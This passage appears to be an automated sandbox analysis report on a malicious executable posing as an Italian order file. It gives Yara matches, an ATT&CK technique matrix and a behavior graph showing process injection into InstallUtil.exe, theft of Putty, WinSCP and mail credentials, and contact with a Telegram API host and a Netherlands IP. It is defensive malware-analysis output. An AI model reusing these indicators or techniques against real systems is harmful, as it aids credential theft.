                  Source: Yara matchFile source: 0000000B.00000002.691821194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.566316771.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.566690397.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.561644091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000000.560802331.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.695886404.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Controllo saldo 30% Ordine 5667.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6104, type: MEMORYSTR
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts211
                  Windows Management Instrumentation
                  1
                  Registry Run Keys / Startup Folder
                  211
                  Process Injection
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  1
                  Account Discovery
                  Remote Services11
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Web Service
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                  Registry Run Keys / Startup Folder
                  11
                  Deobfuscate/Decode Files or Information
                  1
                  Input Capture
                  1
                  File and Directory Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  Exfiltration Over Bluetooth1
                  Ingress Tool Transfer
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  114
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  Automated Exfiltration11
                  Encrypted Channel
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Software Packing
                  NTDS1
                  Query Registry
                  Distributed Component Object Model1
                  Input Capture
                  Scheduled Transfer3
                  Non-Application Layer Protocol
                  SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Masquerading
                  LSA Secrets211
                  Security Software Discovery
                  SSHKeyloggingData Transfer Size Limits4
                  Application Layer Protocol
                  Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common131
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items211
                  Process Injection
                  DCSync131
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  Application Window Discovery
                  Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                  Remote System Discovery
                  Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 615179 Sample: Controllo saldo 30% Ordine ... Startdate: 25/04/2022 Architecture: WINDOWS Score: 100 35 api.telegram.org 2->35 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 7 other signatures 2->53 8 Controllo saldo 30% Ordine 5667.exe 16 7 2->8         started        13 Vajejvz.exe 14 3 2->13         started        15 Vajejvz.exe 2 2->15         started        signatures3 process4 dnsIp5 37 45.137.22.163, 49748, 49787, 49788 ROOTLAYERNETNL Netherlands 8->37 27 C:\Users\user\AppData\Roaming\...\Vajejvz.exe, PE32 8->27 dropped 29 C:\Users\user\...\Vajejvz.exe:Zone.Identifier, ASCII 8->29 dropped 31 Controllo saldo 30% Ordine 5667.exe.log, ASCII 8->31 dropped 55 Writes to foreign memory regions 8->55 57 Injects a PE file into a foreign processes 8->57 17 InstallUtil.exe 14 2 8->17         started        21 cmd.exe 1 8->21         started        59 Multi AV Scanner detection for dropped file 13->59 61 Machine Learning detection for dropped file 13->61 file6 signatures7 process8 dnsIp9 33 api.telegram.org 149.154.167.220, 443, 49777, 49802 TELEGRAMRU United Kingdom 17->33 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->41 43 Tries to steal Mail credentials (via file / registry access) 17->43 45 3 other signatures 17->45 23 conhost.exe 21->23         started        25 timeout.exe 1 21->25         started        signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.